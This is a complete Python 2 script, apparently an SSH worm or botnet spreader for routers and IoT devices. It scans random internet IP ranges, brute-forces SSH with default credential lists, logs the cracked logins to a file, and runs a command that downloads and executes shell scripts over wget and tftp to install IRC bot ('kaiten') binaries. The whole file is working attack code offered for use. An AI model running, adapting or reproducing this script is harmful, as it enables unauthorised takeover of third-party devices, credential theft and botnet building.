#!/usr/bin/env python # #-Put the files in your htdocs directory of a server to host them named something sensible like kaiten-*, wildcard in place of the architecture name. # Set some stuff on your servers so you don't get capped at 476 open SSH connections. #-ulimit -n 99999 #-sysctl -w fs.file-max=100000 # Run heavyhidra #-python infect.py 376 LUCKY x 0 #-python infect.py 376 B 113.53 1 import threading, paramiko, random, socket, time, sys paramiko.util.log_to_file("/dev/null") #Prevents paramiko error spam. files = [ #Files in which we would like to execute upon the routers. "wbin.sh", ] website = "" #Public facing IP hosting the IRC bot binaries. cmd='cd /tmp; rm -rf *;busybox wget -q; chmod +x gtop.sh; sh gtop.sh; rm -rf *; busybox tftp -r tftp1.sh -g ; sh tftp1.sh; busybox tftp -c get tftp2.sh; sh tftp2.sh\r\n' reservedips = [ #Majestic list of reserved IP's we have no reason to scan. Actually quite dull. 'http://127.', 'http://0', 'http://10.', 'http://100.64', 'http://100.65', 'http://100.66', 'http://100.67', 'http://100.68', 'http://100.69', 'http://100.70', 'http://100.71', 'http://100.72', 'http://100.73', 'http://100.74', 'http://100.75', 'http://100.76', 'http://100.77', 'http://100.78', 'http://100.79', 'http://100.80', 'http://100.81', 'http://100.82', 'http://100.83', 'http://100.84', 'http://100.85', 'http://100.86', 'http://100.87', 'http://100.88', 'http://100.89', 'http://100.90', 'http://100.91', 'http://100.92', 'http://100.93', 'http://100.94', 'http://100.95', 'http://100.96', 'http://100.97', 'http://100.98', 'http://100.99', 'http://100.100', 'http://100.101', 'http://100.102', 'http://100.103', 'http://100.104', 'http://100.105', 'http://100.106', 'http://100.107', 'http://100.108', 'http://100.109', 'http://100.110', 'http://100.111', 'http://100.112', 'http://100.113', 'http://100.114', 'http://100.115', 'http://100.116', 'http://100.117', 'http://100.118', 'http://100.119', 'http://100.120', 'http://100.121', 'http://100.122', 'http://100.123', 'http://100.124', 'http://100.125', 'http://100.126', 'http://100.127', 'http://169.254', 'http://172.16.', 'http://172.17.', 'http://172.18.', 'http://172.19.', 'http://172.20.', 'http://172.21.', 'http://172.22.', 'http://172.23.', 'http://172.24.', 'http://172.25.', 'http://172.26.', 'http://172.27.', 'http://172.28.', 'http://172.29.', 'http://172.30.', 'http://172.32.', '', '', '', '', '', '', '', '', 'http://192.0.2.', 'http://192.88.99.', 'http://192.168.', 'http://198.18.', 'http://198.19.', 'http://198.51.100.', 'http://203.0.113.', 'http://224.', 'http://225' ] lucky = ["37.237","37.238","37.239","37.236","191.53","186.208","191.53","186.208","1.0","177.137","177.38","101.108","125.27","177.44","179.189","179.97"] passwords = [ #Some default SSH logins. "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:password", "root:toor" ] print sys.argv[0]+' Threads[max 376] A/B/C(ip class) /RAND IPHERE(1/1.1/1.1.1) 0/1 (password list, root:root) (doesn\'t scan recursively)' #Lack of basic system arguments/coded two years ago. Don't hate. if sys.argv[4] == '1': passwords = [ "admin:1234", "root:root", "root:password", "root:12356", "admin:admin" ] #Faster exploitation with somewhat less results. if sys.argv[4] == 'K': passwords = [ "root:test", "root:root" ] ipclassinfo = sys.argv[2] if ipclassinfo == "A": ip1 = sys.argv[3] elif ipclassinfo == "B": ip1 = sys.argv[3].split(".")[0] ip2 = sys.argv[3].split(".")[1] elif ipclassinfo == "C": ips = sys.argv[3].split(".") num=0 for ip in ips: num=num+1 if num == 1: ip1 = ip elif num == 2: ip2 = ip elif num == 3: ip3 = ip class sshscanner(threading.Thread): global passwords global ipclassinfo if ipclassinfo == "A": global ip1 elif ipclassinfo == "B": global ip1 global ip2 elif ipclassinfo == "C": global ip1 global ip2 global ip3 def run(self): while 1: try: while 1: thisipisbad='no' if ipclassinfo == "A": self.host = 'http://'+ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "B": self.host = 'http://'+ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "C": self.host = 'http://'+ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256)) elif ipclassinfo == "LUCKY": self.host = 'http://'+random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) else: self.host = 'http://'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) for badip in reservedips: if badip in self.host: thisipisbad='yes' if thisipisbad=='no': break self.host=self.host.replace('http://', '') #This could be optimized. This is bad code. No idea why I did it like this. username='root' password="0" port = 22 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(3) s.connect((self.host, port)) s.close() ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) dobreak=False for passwd in passwords: if ":n/a" in passwd: password="" else: password=passwd.split(":")[1] if "n/a:" in passwd: username="" else: username=passwd.split(":")[0] try: ssh.connect(self.host, port = port, username=username, password=password, timeout=3) dobreak=True break except: pass if True == dobreak: break badserver=True stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig") output = stdout.read() if "inet addr" in output: badserver=False websites = [ ] if badserver == False: print 'Infected: '+username+'<'+password+'>'+self.host+'|'+str(port) ssh.exec_command(""+cmd+"") infectedip = open("rooted.txt","a").write(username+":"+password+":"+self.host+"\n") time.sleep(30) ssh.close() except: pass for x in range(0,int(sys.argv[1])): #This may abuse your system resources and anger network administrators. try: t = sshscanner() t.start() except: pass